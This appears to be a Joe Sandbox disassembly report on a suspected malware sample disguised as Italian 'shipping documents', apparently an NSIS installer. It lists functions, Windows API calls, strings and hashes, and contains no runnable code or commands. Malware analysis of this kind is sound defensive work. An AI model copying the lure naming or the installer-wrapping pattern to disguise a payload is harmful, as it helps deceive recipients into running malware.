                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-2502969717
                                                  • Opcode ID: 6ad6d118b66c6cdac93a21cf44a1797848e74ee065974fce26df8e3808a08917
                                                  • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                  • Opcode Fuzzy Hash: 6ad6d118b66c6cdac93a21cf44a1797848e74ee065974fce26df8e3808a08917
                                                  • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,76233420,76232EE0,00434000), ref: 00405DD7
                                                  • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,76233420,76232EE0,00434000), ref: 00405E1F
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,76233420,76232EE0,00434000), ref: 00405E42
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,00434000), ref: 00405E48
                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,00434000), ref: 00405E58
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                  • FindClose.KERNEL32(00000000), ref: 00405F07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: POB$\*.*
                                                  • API String ID: 2035342205-2418784330
                                                  • Opcode ID: 6622ab5639dd30ba5a14c76c08f849f60dd3b1310bdf1729716a2bece7885b77
                                                  • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                  • Opcode Fuzzy Hash: 6622ab5639dd30ba5a14c76c08f849f60dd3b1310bdf1729716a2bece7885b77
                                                  • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                  • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                  • GetClientRect.USER32(?,?), ref: 00405910
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                  • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,?,00404481), ref: 00404664
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                  • ShowWindow.USER32(00000000), ref: 00405A5F
                                                  • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                  • ShowWindow.USER32(00000008), ref: 00405AAE
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                  • CreatePopupMenu.USER32 ref: 00405AF3
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                  • GetWindowRect.USER32(?,?), ref: 00405B27
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                  • OpenClipboard.USER32(00000000), ref: 00405B88
                                                  • EmptyClipboard.USER32 ref: 00405B8E
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                  • CloseClipboard.USER32 ref: 00405BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H/B${
                                                  • API String ID: 590372296-332483393
                                                  • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                  • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                  • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                  • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                  • DeleteObject.GDI32(00000000), ref: 00405188
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,?,00404481), ref: 00404664
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                  • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                  • GlobalFree.KERNEL32(?), ref: 004054C8
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 00405624
                                                  • ShowWindow.USER32(?,00000000), ref: 00405672
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                  • ShowWindow.USER32(00000000), ref: 00405684
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                  • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                  • ShowWindow.USER32(?), ref: 0040417E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                  • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                  • DestroyWindow.USER32 ref: 004041BD
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                  • GetDlgItem.USER32(?,?), ref: 004041F5
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                  • GetDlgItem.USER32(?,?), ref: 004042BB
                                                  • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404330
                                                  • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                  • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                  • EnableWindow.USER32(?,?), ref: 00404409
                                                  • EnableWindow.USER32(?,?), ref: 00404424
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040443A
                                                  • EnableMenuItem.USER32(00000000), ref: 00404441
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404459
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                  • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: H/B
                                                  • API String ID: 1860320154-184950203
                                                  • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                  • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D
                                                  APIs
                                                    • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                    • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                  • lstrcatW.KERNEL32(00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420,00436800,00000000,00434000,00008001), ref: 00403DF5
                                                  • lstrlenW.KERNEL32(00427A00,?,?,?,00427A00,00000000,00434800,00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420), ref: 00403E75
                                                  • lstrcmpiW.KERNEL32(004279F8,.exe,00427A00,?,?,?,00427A00,00000000,00434800,00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                  • GetFileAttributesW.KERNEL32(00427A00), ref: 00403E93
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403EDC
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                  • RegisterClassW.USER32(00428A00), ref: 00403FDE
                                                  • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-3957238721
                                                  • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                  • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040487E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004048AF
                                                  • GetSysColor.USER32(?), ref: 004048C0
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                  • lstrlenW.KERNEL32(?), ref: 004048E1
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                  • SendMessageW.USER32(00000000), ref: 00404963
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                  • SetCursor.USER32(00000000), ref: 004049E2
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                  • SetCursor.USER32(00000000), ref: 004049FE
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404A2D
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N$WG@
                                                  • API String ID: 3103080414-2930149691
                                                  • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                  • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                  • wsprintfA.USER32 ref: 00406367
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,00437800,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 004061B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                  • API String ID: 2171350718-2529913679
                                                  • Opcode ID: e6891909890e267c24b8bd553358289a36bdaf0c1f8090d9d78c2674567931e5
                                                  • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                  • Opcode Fuzzy Hash: e6891909890e267c24b8bd553358289a36bdaf0c1f8090d9d78c2674567931e5
                                                  • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                  • lstrcmpiW.KERNEL32(00427A00,00422F48,00000000,?,?), ref: 00404C79
                                                  • lstrcatW.KERNEL32(?,00427A00), ref: 00404C85
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                    • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,00434000,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,00434000,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                    • Part of subcall function 00406950: CharPrevW.USER32(?,?,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D5A
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                    • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                    • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                    • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
